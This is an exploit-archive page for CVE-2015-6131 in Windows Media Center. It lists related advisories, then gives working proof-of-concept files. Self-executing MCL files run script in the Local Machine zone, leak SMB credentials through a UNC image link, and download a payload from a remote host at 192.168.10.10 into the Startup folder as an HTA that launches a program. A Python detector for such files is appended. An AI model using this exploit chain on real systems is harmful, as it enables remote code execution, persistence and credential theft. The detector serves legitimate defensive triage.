| Title | Published | Views | Family |
|---|---|---|---|
| Microsoft Windows Media Center Library Parsing RCE Vulnerability aka "self-executing" MC | 9 Dec 2015 00:00 | – | zdt |
| Microsoft Windows Media Center Library Analysis RCE Vulnerability | 9 Dec 2015 00:00 | – | cnvd |
| Microsoft Windows Media Center Remote Code Execution (MS15-134: CVE-2015-6131) | 8 Dec 2015 00:00 | – | checkpoint_advisories |
| CVE-2015-6131 | 9 Dec 2015 11:00 | – | cve |
| CVE-2015-6131 | 9 Dec 2015 11:00 | – | cvelist |
| Microsoft Windows Media Center Library - Parsing Remote Code Execution aka self-executing MCL File | 9 Dec 2015 00:00 | – | exploitpack |
| KLA10714 Multiple vulnerabilities in Microsoft Windows | 8 Dec 2015 00:00 | – | kaspersky |
| KLA10715 Multiple vulnerabilities in Microsoft Windows Media Center | 8 Dec 2015 00:00 | – | kaspersky |
| CVE-2015-6131 | 9 Dec 2015 11:59 | – | nvd |
| Microsoft Windows Media Center Remote Code Execution Vulnerability (3108669) | 9 Dec 2015 00:00 | – | openvas |

Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)
Software Vendor: Microsoft
Software version: MS Windows Media Center latest version on any Windows OS.
Software Vendor Homepage: http://www.microsoft.com
CVE: CVE-2015-6131
Exploit Author: Eduardo Braun Prado
Official vulnerability discoverer: Zhang YunHai of NSFOCUS Security Team
Date: December 8, 2015
Vulnerability description:
Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which are then parsed inside the Windows Media Center window in the context of the Local Machine security zone of Internet Explorer. This in turn allows execution of arbitrary code using, e.g., ADO ActiveX objects. Such files are also known as "self-executing" MCL files.
Exploit code below:
----------- self-exec-1.mcl ------------------------------------
<application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html>
------------------------------------------------------------
----------self-exec-2.mcl--------------------------------------
<application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close();
</script></html>
----------------------------------------------------------
-----Create-recordsetfile.hta --------------
<html><body onload="aa()">
<script language="VBScript">
function aa()
defdir="."
alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"".
Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
set rs =CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
al=rs.Save(defdir & "\recordsetfile.txt")
rs.close
end function
</script></body></html>
-------------------------------------------------------------------------------
---------recordsetdata.txt------------------------------------------
<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------
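
For triage on a mail gateway or file share, the self-reference described in the vulnerability description can be checked statically. The following is an added example, not part of the original advisory: the function name `inspect_mcl`, the finding labels and both sample files are constructed for illustration.

```python
import re

# url attribute of the <application> element. The files shown in the advisory
# are not well-formed XML, so a tolerant regex is used instead of an XML parser.
APP_URL = re.compile(rb"""<application\b[^>]*?\burl\s*=\s*["']?([^"'\s>]+)""", re.I)

# Content a plain Media Center link file has no reason to carry.
MARKERS = {
    "embedded_script": re.compile(rb"<script\b", re.I),
    "activex_instantiation": re.compile(rb"\b(?:ActiveXObject|CreateObject)\b", re.I),
    "unc_reference": re.compile(rb"""(?:src|href)\s*=\s*["']?\\\\[^\s"'>]+""", re.I),
}

def inspect_mcl(file_name, data):
    """Return sorted finding labels for one .mcl file (its name and raw bytes)."""
    findings = set()
    own = re.split(r"[\\/]", file_name)[-1].lower()
    for match in APP_URL.finditer(data):
        # Drop query/fragment and trailing slashes, keep the last path component.
        url = re.split(r"[?#]", match.group(1).decode("latin-1"))[0].rstrip("/\\")
        target = re.split(r"[\\/]", url)[-1].lower()
        if target == own:
            findings.add("self_reference")   # the file names itself as its page
        elif target.endswith(".mcl"):
            findings.add("mcl_target")       # points at another link file
    for label, pattern in MARKERS.items():
        if pattern.search(data):
            findings.add(label)
    return sorted(findings)

# Constructed samples (hypothetical names and hosts, no active payload).
SAMPLE_BENIGN = b'<application url="http://example.invalid/app.html" name="Demo"/>'
SAMPLE_SELF = (b'<application url="demo.mcl"/><html>'
               b'<img src=\\\\host.invalid\\share\\a.jpg>'
               b'<script>/* placeholder */</script></html>')

if __name__ == "__main__":
    for name, blob in (("benign.mcl", SAMPLE_BENIGN),
                       ("C:\\Users\\u\\Downloads\\Demo.MCL", SAMPLE_SELF)):
        print(name, inspect_mcl(name, blob))
```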